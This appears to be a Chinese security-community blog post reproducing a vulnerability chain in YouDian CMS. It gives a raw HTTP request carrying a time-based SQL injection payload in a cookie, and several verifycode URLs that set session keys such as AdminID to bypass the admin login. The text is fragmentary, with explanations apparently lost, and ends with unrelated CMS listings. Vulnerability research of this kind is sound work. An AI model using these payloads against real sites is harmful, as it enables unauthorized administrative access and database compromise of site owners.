友点CMS GETSHELL
白帽子社区
共 1883字,需浏览 4分钟
·
2021-07-07 17:51
作者:Ca1y0n 编辑:白帽子社区运营团队
"白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)
"
在逛论坛的时候发现该漏洞,于是本地搭建环境复现了一下
$this->_fromuser
App/Lib/Action/Home/ChannelAction.class.php
GET /test/yd//index.php/Channel/voteAdd HTTP/1.1
Host: 192.168.2.152
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: youdianfu[0]=exp;youdianfu[1]==(select 1 from(select sleep(2))a)
Upgrade-Insecure-Requests: 1
App/Lib/Action/AdminBaseAction.class.php
isLogin 和checkPurview
App/Lib/Action/BaseAction.class.php
http://IP/index.php/base?a=verifycode&verify=
根据后台登陆的权限校验,可以设置session键值名绕过登陆
http://IP/index.php/base?a=verifycode&verify=AdminID
http://IP/index.php/base?a=verifycode&verify=AdminName
http://IPindex.php/base?a=verifycode&verify=AdminGroupID&mode=1&length=2
评论
Wolf CMS轻量级CMS系统
WolfCMS是一个轻量级的CMS系统,包含一组插件,支持每页定制,灵活的页面内容和可重用的片段。License:OpensourceServerLanguage:PHP5+Database:Yes.
Wolf CMS轻量级CMS系统
0
NukeViet CMS
NukeViet是款来自越南功能全面,多用途的开源CMS。NukeViet是越南Vietnam公司的第一款开源CMS系统,最新版为NukeViet3,全面采用xHTML,CSS3,Xtemplate,
NukeViet CMS
0